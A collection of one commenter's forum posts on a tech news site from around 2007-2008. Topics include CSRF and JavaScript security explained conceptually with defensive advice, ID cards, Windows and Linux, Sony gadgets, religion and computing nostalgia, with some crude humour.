50 posts • joined Saturday 26th May 2007 05:53 GMT
Just for the record the winning bid was £14,500.10. They must really have a sweet tooth. (Okay, it was all in aid of the Retail Trust charity.)
£10m bid? Oh, how the hoax bidders must have laughed.
csrf is suble
Nothing technical about it. It can be coded either way. The server has all the same information. With broadband, conventional page reloading is not the tedium it once was with dial-up. I'm in agreement about the slick interface for an app feel. There are some very good ones out there. For the discussion of the article, however, the former does not demand JS, the latter cannot function without it. And JS opens up the prospect of CSRF...
It has nothing to do with phishing nor input validation. It is impersonation and forged requests. My website can be perfect but can still be the target of attacks from another site with XSS holes. But (and it's a big but) the requests are from my customers. I cannot distinguish real requests from forged ones unless I make user access such a pain that nobody wants to visit. With CSRF you'll realise there is almost no easy defence against it /and/ keep all your users. Hence the doom and gloom of the article.
To recap, it happens like this. We have four agents in this scenario.
- Bob, at home, using his browser.
- SiteA, perfect, with no XSS holes or anything. Perhaps a bank.
- Sid the bad guy who want to rip off Bob's account at SiteA.
(1) Sid puts malware on SiteB.
(2) Bob visits SiteA and logs into his account. SiteA sends Bob a cookie (a random token or nonce) so that further requests from his browser do not require him to re-enter his password for every requested page (a convenience feature).
(3) While still browsing SiteA, Bob opens up a new tab and surfs into SiteB.
(5) SiteA receives this request. It is coming from Bob's browser at his IP address along with the Bob's cookie for SiteA. The server checks the cookie and sees that it's a valid cookie for Bob's current session and executes the request. Fill in the blanks of what the request could be. SiteA logs the request, IP address etc.
(6) Much later Bob complains to SiteA that his bank account is now empty. SiteA examine the logs and sees that it was Bob who made the request and tells him tough bananas.
While it is up to SiteA to do all they can to thwart this (they don't want customers being ripped off) you need to be aware of what might be going on while browsing. If you browse one site at a time, logout and delete cookies before going somewhere else then leaving JS on is just fine. If you like to have many tabs open (I do) then you need to make the necessary security adjustments. You could keep one browser strictly for online banking.
A long post but I hope it clears up why this is important. It's not that I hate JS (or Web 2.0), it's that it's too dangerous to just give it free reign for no really good reason.
If that's how you ensure your own security, knock yourself out.
I notice that you've not addressed the charge that running untrusted code on your own machine is dangerous. Do you wonder why noscript is the most popular add-on for Firefox? Or why IE is now copying it?
Sure, we could outlaw cookies (another solution), but then we have the session id problem. Embedded tokens only leads to either session fixation or a broken back button (the most used button on a browser) and does not fully fix the CSRF vulnerability. SSL ids for session ids is a good solution but has it's own penalties. It's a tricksy problem and the devil is in the detail.
It is an imperfect universe filled with Windows and bad people who just won't play cricket. This isn't helped by client-side scripting languages with too much power and users who opt for convenience over security. I know, guns don't kill people but until there is sandboxing or virtual browsers or whatever it is a solution that works 100%.
Go and read the forums at the hacker sites and consider whether one should be doing everyday browsing with JS enabled?
Yes, it annoys me that in 2008 some sites resort to "enable JS or fuck off" for stuff that doesn't even need to be. JS links anyone? JS breaks the Web for the blind, disabled or anyone using a stylus. You know, that accessibility thing. Web 2.0 be damned. Does El Reg demand its users be JS-enabled? Even Gmail has a non-Web-2.0 interface that works really well.
JS is necessary for media type stuff hence my keeping Mozilla JS+Flash enabled to visit utoob. Actually, the new look Beeb site is a good example of providing accessibility and (semi-nagging) relevant alternatives to embedded Flash. The JS provides additional functionality not critical functionality. Web 2.0 stuff is pretty groovy and the slick interface seductive but there is nothing JS can do that cannot be done by a scripting server (I do it everyday).
JS has been given too much power and now it's being abused by those who want to steal your money. It's your choice: keep your accounts secure or create another million zombies.
Everything can be faked. See http://en.wikipedia.org/wiki/XHR
(1) Disable JS, Flash and other random downloaded code exectutors to mitigate the XHR problem.
(2) Log out when done and delete cookies - tell the browser to only use session cookies (Mozilla allows this).
(3) Only keep one browsing window open when visiting important sites to limit cookie exposure (and delete them when done)
(4) As suggested, use multiple browsers. I use Konqueror (no JS, no plugins, cookies) and Mozilla (JS, Flash, session cookies only) this way.
For web dev:
(1) Don't use JS and recommend user's disable JS (a long shot but hey it's you that's being ripped off.)
(2) Add the following iframe breakout script to every page
If anyone tries to put your site in an (invisible or otherwise) iframe it will become pretty obvious to the user who will then (hopefully) contact the hosting site to say that something is horribly wrong and the webmaster can go and fix the XSS to whatever they are hosting.
location.href could be replaced with a redirect to some other site (so as not use your cookies) or to a page on your site that deletes your cookies on the browser to make them safe.
(3) Reconfirm credentials often. Keeping the sessions short to mitigate time at risk. And ask for passwords to authorise actions on really sensitive pages.
(4) As already suggested, random tokens to return to the site as GET or POST parameters will stop the less sophisticated attacks that do not scan for tokens. An advanced JS script with XHR can load a page, scan for the token value, insert it, post it back @Nick Clarke: a neat idea but a preprogrammed script could search for the JS rather than hidden input tags. It would need to be a big XSS hole but it's possible.
late great bill hicks
@Hud who? Too true.
@Hud. Check out YouTube. You know the drill.
Looking at this optimistically, this can only be a good thing - a whole new generation will be turned on to his works and begin a journey of enlightenment and clearer thinking.
ID Cards are not about security
As we all know ID cards have nothing to do with security. The security experts all say its about control. And a big fat gravy train for Herr Brown and chums.
'A National ID Card Wouldn't Make Us Safer'
'Ex-MI5 Chief Calls ID Cards "Useless"'
and many others...
hurrah! bsod decends on windows
Nasty. Being boiled is too good for them. More cruft for s'kiddies to abuse Windows lusers. Article is thin on how the worm propagates. I'm guessing that a firewall will keep the bugger out and that it's intended as an email attachment that will run an internal (Windows) intranet ragged.
And how does a UFD infect your machine? Does Windows really autorun from UFDs? Or is this U3 or whatever nonsense? Will Microsoft never learn. Doesn't affect Linux of course.
Anyway, as ever the cure is get a real OS and install Linux.
Re: Re: They're all wrong
billion as 10^12 "becoming obsolete"
Unfortunately the crimes committed against our beautiful language by our Septic Cousins seem to stick - but only in the English speaking world. The rest of the world still calls 10^9 milliard and 10^12 billion.
10^9 vs 2^30
This is a long standing bugbear. It's been long established, rightly or wrongly, that fs storage is measured using M=10^6 and G=10^9 whereas RAM has always been K=2^10 and M=2^20 and G=2^30 (more due to their intrinsic design requirements). I guess it's debatable which one applies to flash memory. Clearly the marketroids are going to go for the one that makes it look bigger. Traditionally communications and bitrates have always been powers of 10.
We have long had the prefix K=1024 so as not to confuse it with the SI unit of k=1000. But after that all bets are off. The other prefixes, whether "G" or "giga" are strictly SI units. So Creative are correct about using powers of 10 to describe gigabytes. Some smart folk came up with Ki/Mi/Gi (kibi/mibi/gibi and so on) for the powers of two. While they are a bit ugly, perhaps it's time to start using them. Linux already uses them for its utilities. Maybe The Reg can champion their use?!
So, I have a 4Gb UFD that is 4043Mb or 3948Mib.
UCE vs spam?
I always thought the first spam (vs UCE) appeared on Usenet (early '90s?) where two US lawyers cross-posted advert-laden messages across thousands of groups. Cross-posting on its own is a capital offence on Usenet but advertising as well! Regardless of the flame war they created, the two mother lovers were proud of their stunt.
My point is at the time there was differentiation between UCE (what is now email spam) and Usenet spam. I don't really see the need myself but some pedants at the time were quite adamant about insisting on the correct terminology...
Oh yeah, clicking on and/or buying from a spammed link should be punishable by public boilng.
Dilemma? Just fix it already, duh. I don't believe the airheads still using Windoze and allowing their machines to become zombies would even notice. And if it did go tits up how would they know it was the fix and not the zombie code? A fresh reinstall might well do their machine a world of good and rid it of any other parasites they are doubtless hosting.
Better still, install a keylogger, grab the lusers credit card number and order them a copy of F-Secure et al. D'ya think they'd get the message? Hell, why not just install Ubuntu and have done with it.
If TP leaves the network be, then the spammers will see these reports (if they haven't already) and reconfigure Kraken. TP will be back to where they started and the rest of us will continue to drown in invitations to buy dodgy rolexes and fake v1Agrrr.
An interesting idea
So many times when searching all I get is a blizzard of directory sites. Usually when looking for odd behaviour of product X and all that shows up is sites informing you of sites flogging product X. Excluding these sites from the search would be brilliant.
I guess they don't want to affect the global status of links thus the need to be logged in. Google won't spy on us surely? Nah. If we have to log in then maybe be able to create preset search parameters to make similar searches a breeze. (If Google are reading this!)
It would be useful to be able to tag or categorise sites and be able to include or exclude them when doing searches. Or be able to specify the type of site one is looking for. User tags might be more useful (and avoid sites keyword spamming) with some kind of evolution of the fittest process so that weak tags (left by some ranter) are eventually culled and the strongest appear first. Hey, sounds like a patent idea (TM).
Windows Live - Why?
Windows Live - Don't even think of visiting using Linux
Windows Live - When we suck, you suck too.
Windows Live - The world is not enough.
Windows Live - Assimilate and extend.
Windows Live - We are not a commodity.
Windows Live - Better dead than Windows.
Windows Live - You'll wish you were dead.
Windows Live - You'll wish M$ was dead.
Windows Live - Spam, not content.
Windows Live - Only one ActiveX plugin away...
Windows Live - Where clear thinkers dare to tread.
Windows Live - A World of Pain.
Windows Live - Abandon all hope.
outdated business model
Religion is nothing more than an outdated business model and, much like other businesses we've seen, its CEOs are clinging on to old ideas and suing all and sundry around them to have their way.
In its time it was the law when there wasn't law. It was about controlling the plebs. A commentary on how to behave in social situations and the like. Not eating swine is handy health advice in hot climes before the invention of the refrigerator. Now we have 'fridges it's redundant advice. Now we have our modern-day laws. Now we have science and understand there is no god or gods. Only atoms and the universe.
Science has demonstrated time and time again the fallacies in the various Good Books. Earth-centric universe anyone? Earth created 6kya? Total lack of mention of dinosaurs? How about the various "acts of god" demonstrating there is nobody out there or He is indifferent to human suffering. And while religious intolerance has caused more killing than anything else in human history I think the psychopaths in society will just find some other reason to kill each other.
I've read most of his books I can see Dawkins is an astonishingly clear thinker. People are opening their eyes and seeing that the indoctrination they were subjected to as kids is just nonsense.
Religion is dying concept. Get over it.
stop the planet
This lunatic obsession with ID cards just never ends.
Stop the planet. I want to get off.
It's ironic that the two who thought they had a hot young date turn out to be both middle aged. The sadness is the guy then couldn't see the funny side and have a laugh over it and maybe make a good online friendship and instead became obsessed to the point of killing.
The BBC Worldservice podcast go into some detail about the incident. Get 'em while they're hot (only kept up for 7 days.) Look for chatroom murder 22 Nov 2007:
There must be some moral point to this story that presently escapes me...
Isn't Brontosaurus a deprecated designation for what is now officially Apatosaurus? Aww, hell. you're right, who cares.
One of my favourite units is the attoparsec. Very nearly 1 inch. Though it does seem pointless to introduce another unit for the much the same thing.
By "one secure location" you mean "central location unencumbered by passwords or encryption or anything allowing easy access by all and sundry."
I get it. The best way to prevent passwords being compromised is dispense with them altogether. Hurrah! We're secure!
Some people will never learn. Using biometrics for identification is a fatally flawed concept. A compromised password or bank account details is hassle but they can be replaced at the drop of a hat and normal life resumes. If the biometric hashes for your id are stolen what do you do? Get a new id? New fingerprints? Iris? Humm. Thought so. And it only has to be compromised once by some minimum-wage flunky...
This compromise demonstrates that no government department is fit to hold this data regardless of how much they promise to look after it.
Go and read Bruce Schneier's books (and others) for the grisly details.
I can only think that some chums of the current and previous Junta are setting up a big fat IT gravy train and they've seduced enough ministers into the ridiculous notion that it will somehow make the world a safe and happy place.
I remember some of the older geezers (the real UNIX grey beards) reminiscing over the PET when the Amiga was still king. They had fond memories. I was a bit too young at the time and was still drooling over Princess Leia (or was it R2D2) at the time. I love the Deep Thought photo.
A built-in cassette deck? How modern. Clearly Commodore didn't want any of this mucking around with cassette leads like we had to with the Speccy. It wasn't until the CPC when Sir Alan slapped a deck onto the side of his carbuncle.
I still have a Tatung Einstein and several Speccys and ZX81s around somewhere. The Amigas are still a joy to use. Doing stuff the upstarts of today can only dream about. Linux is the closest I'll ever get to the robustness and flexibility of the Amiga...
When I were a lad we used to 'ave to squeeze subroutine in't 100 bytes, graphics, sound an all, using hand crafted assembler, an't use ROM image for random numbers. And still have bytes left. Try you try telling that to the kids of today... and they won't belief you.
The rabbit commercials. That takes me back. I remember some spotty oik (was he from Grange Hill?) that said you can make calls whereever you see the 'rabbit' (sounds trippy now I say it).
My first 'phone was the Motorola v3688. I seem to remember it was call the v.small and the ads had a tiny baby tortoise crawling on it or something. Still pretty small but not as slim as todays models.
This mucking around with cameras, projectors, metamaterials and other advanced technology is altogether unnecessary. All one would need is a large octopus skin (or several sewn together) within which to enclose the tank and an octobrain as the central cloaking control mechanism. How hard can it be?
The War for Freedom. Part 2.
< Hey, is this Jobs Satan or Ballmer Satan?
To quote Kosh, "It begins."
Follow the money and you will likely find MS funding this. The close examination of Linux regarding patents and the like during the SCO fiasco will soon put these lusers to bed and hopefully, like SCO, permanently.
MS just don't like to share. The only way they are able to keep customers is to handcuff them to the radiator at gunpoint. It's sad that the only way to run a business is by threats and not the merit of your products.
Another quote (from memory) that springs to mind is from Princess Leia Organa, "The more you tighten your grip the more star systems slip will through your fingers."
At least bad drivers will be quickly and efficiently culled from the herd.
It sounds like a fab idea. Likely huge repercussions for society. Think of the mayhem as the paparazzi chase celebs around the sky. Weekend in Paris? Customs? Pah! Mobile phones won't work properly though (maybe a good thing). How will the speed Taliban persecute the motorists now? No more getting stuck on a windy road behind some dodery airhead towing a caravan...
Sky-loving Shill Alert!
Who's been suckling on Murdoch's oily teat then? Normally I'm not one to attack a person for their misguided views but such a brazen and offensive DTT hit piece could not go unremarked.
Analogue vs digital? Do you think anyone other than us geeks know or care about the underlying technology? Your fixating on the tech. To non-geeks it's just a TV channel. Nothing else.
Sky subscribers are a sad bunch of sheep. they get shafted paying an outrageous subscription for trash channels and are still inflicted with adverts! Rupert Murdoch is laughing in your faces.
Handing the TV monopoly to megalomanic Murdoch? I guess you get your OS from Microsoft too? If we allow such a monopoly all we will end up with is shit on every channel targeted at the lowest common denominator (see Sky).
I take it you must be a marketeers dreamboy. You eat at McDs, holiday at Disneyland, watch Sky and buy your jewellery from QVC (I'd say watch The Peter Serafinowicz Show but we know how much you hate the BBC).
I'd happily pay the TV licence just to fund the BBC and Channel 4. They are the only ones with (mostly) excellent and interesting programming. And I'll never give RM even a single penny. Ever.
Crucifiction's too good for these wankers polluting our lovely 'net. I can think of a better lingering death involving knitting needles and a hair drier. As for the tossers that actually respond to this shite...
Oh, don'tcha just love visiting The Reg after a night at the pub. Hey, what are these icon thingies?
<sigh> yet another case of self-inflicted foot in mouth disease. Anyone who wants to rip the movie will have done so. Punishing the users who are *actually paying money for the stuff* will end up with them return the crap for a refund.
To Sony: remember this at your peril. Destroying customer's expectations will be rewarded by them being scared away from making furthur purchases. And in this market there is competition. Remember the Memory Stick incompatibility fiasco? I do.
Reading some of the above comments regarding software bundled with the player and re-reading the article I popped over to the Sony site and downloaded the manual.
Well, according to the manual it really does appear to do what it says on the tin: it mounts as a USB Mass Storage Device on your favourite OS. There is software bundled with the player called "AutoTransfer", and, as the article points out, it appears to essentially sync a designated music folder on your PC with the player. I assume the software is Windows only. The manual implies you can delete this software and accompanying PDF user manual and get a bit more space on the device.
Though ominously on the last page the manual then says that the only supported OSs are 2k, XP and Vista and if you want anything else you can go fuck yourself (or words to that effect.)
I'll contact Sony to confirm if it really is a USB Mass Storage Device, that they made a mistake and it will in actual fact support Linux...
What's happened to Sony?
Wow. Sony have finally realised the pretty gadgets laughingly called mp3 players (actually atrac players) are utterly pointless for anyone using Linux. Or OSX. Or no longer trusts Sony's software offerings. Looks like a groovy device. I might have to get one as a reward to Sony for finally seeing the light! Probably the F model with FM radio.
What with the RDR-HXDx70 series of recorders, it appears that Sony are waking up to producing stuff people want. Hurrah!
(Long time Sony fan but not tempted by their handiwork for many years. Poor design, poor build. That, and, along with everyone else on the planet, the unforgivable bandwagon jumping of lets not give anyone any choice even if they already have stuff in black, and love black, and hate anything not black, and go and paint everything that's lovely and wonderful that vile and hideous colour, that custard of Satan's loins, the wretched pustule encrusted silver. Grrr.)
John C. Dvorak and crankygeeks.com
"John C. Dvorak talked about this in his column weeks ago.
OT but, there's a link from the pcmag site to JCD's crankygeeks.com where he has a video magazine thingy. Watching the latest episode now (#83) and noticed there's some guy on the show called Drew Cullen from The Reg...
Amazing. Let's see if I've understood this.
(A) Use Google or OpenOffice giving unrestricted access to your files using standard open file formats.
or (B) Use a service that requires MS Office or restricts access to your files and uses non-standard closed proprietary file formats.
Humm, difficult choice.
>>"(5) You must point out spelling, grammer, calculator gaffes and other faux pas. Try not be overly smug."
>"...It's "GRAMMAR", you peasant!"
Oh, the irony.
(10) Do not ever forget this: your computer hates you. Features such as, say, the spell checker, will bite you back at a moment precisely calculated to be the most inconvenient and embarrassing.
(11) You must blame the computer for suboptimal processing of data in the vain hope of diverting attention away from one's failings.
(1) You must not talk about Reg Club
(2) You must not talk about Reg Club
(3) You must not, under any circumstances, ask what the IT angle is.
(4) The Reg is mother, The Reg is father, The Reg is your friend. Trust The Reg.
(5) You must point out spelling, grammer, calculator gaffes and other faux pas. Try not be overly smug.
(6) You must refer to anatomical features by anything other than established jargon or slang.
(7) You must not expect sympathy when, as a Windows/Explorer/Word/Excel luser, you get a virus/Trojan/worm/lose all your data/computer explodes.
(8) You are positively encouraged to indulge in bigging up Linux but please keep it brief. You're preaching to the choir.
(9) Sarcasm must not be delimited by <sarcasm> tags lest we be deprived of the frantic replies of the humour challenged among us.
just say no to js
Of course, XSS, can be prevented if the sites in question are ruthless with input filtering and html quoting. If. Having some js to do frame breakout will make iframe injection attacks pretty obvious. Ahh, frames. Don't you wish you could go back in time and give that smartarse at Netscape a good kicking. It would have been nice for a site to inform the browser than js should be disabled for this page regardless of any other setting or outer frames. But it's way too late for that.
CSRF is a trickier beast. It's your site (which naturally is perfect) being attacked by a badguy or compromised site. As the request comes from a legitimate user of your site, or technically from their browser, discriminating a genuine request from a bad one is a knotty problem. A solution being to ask for their password to confirm serious actions.
Or, ironically, have some js detection code to say "This site best viewed with JS off."
The joys of unintended consequences...
You know what to do...
This is just one of the many reason why 98SE was my last Windows. It's been said often enough and I fail to see why everyone is surprised when MS screws them, again.
Get Linux. Be in control of your own destiny.
I heard that chilli also speeds up the metabolism so you lose weight, or don't put it on, or something. At least that's how I understood it. Sounds as amazing as that wonder-cure-all herb, garlic.
Right, that's tonight's menu sorted then.
Hey, they're pretty cool if a little geeky. Would be a talking point at a party and depending on the type of party you could get twice the trip. And if they come with headphones, Terminator sound effects, real time object identification system and list of handy responses for when one's grey stuff is off playing with the pixies...
"...Google could care less about that though..." should be "couldn't care less" - it doesn't make sense otherwise, unless Google do want to release their code?
Google wanting to keep their own code as a trade secret is completely understandable. So long as it is in-house I don't see why there should be a problem. I guess they figure that such things like the search and ranking algorithms are part of what makes Google different from other search engines. I wouldn't be expected to release the code for my website just because I'm using a LAMP setup?
Of course, nobody's forced to use Google, Gmail etc, unlike, say, wanting to play the latest game, which pretty much demands Windows. (Though I do have Quake III for Linux.)
As for moving from Google webmail to Yahoo webmail (which I think is what you're suggesting) why would one want this? Sign up for both (they're free). Tell people one or the other depending on whichever has your favour that month. If it's not being tied to a single ISP that you're after get your own domain and redirect email to whomever you like.
"The system is now being run on 32 IBM HS21 high-density, dual-processor, dual core Blade Servers, which gives it 68 processors and 128 cores..."
That would be 64 processors, surely? (and don't call me Shirley)
As well as the usual stuff of not using IE nor Windows, if you need access to your online bank the simple solution is to boot from Knoppix. It being a live-CD that doesn't touch the hard disk you can use it with confidence even if you are uncertain about what may be lurking within your OS.
Connection to Ethernet modems is easy-peasy with DHCP - no configuration required. Your milage might vary with a USB modem (throw it away and get a real modem). Even though I'm a happy Debian user I still use this technique to access my bank, just to be sure. Rebooting the machine is a hassle but it is *your* money that's at stake.
- Facebook offshores HUGE WAD OF CASH to Caymans - via Ireland
- Justin Bieber BEGGED for a $200k RIM JOB – and got REJECTED
- Microsoft teams up with Feds, Europol in ZeroAccess botnet zombie hunt
- Mexican Cobalt-60 robbers are DEAD MEN, say authorities
- Apple's spamtastic iBeacon retail alerts launch with Frisco FAIL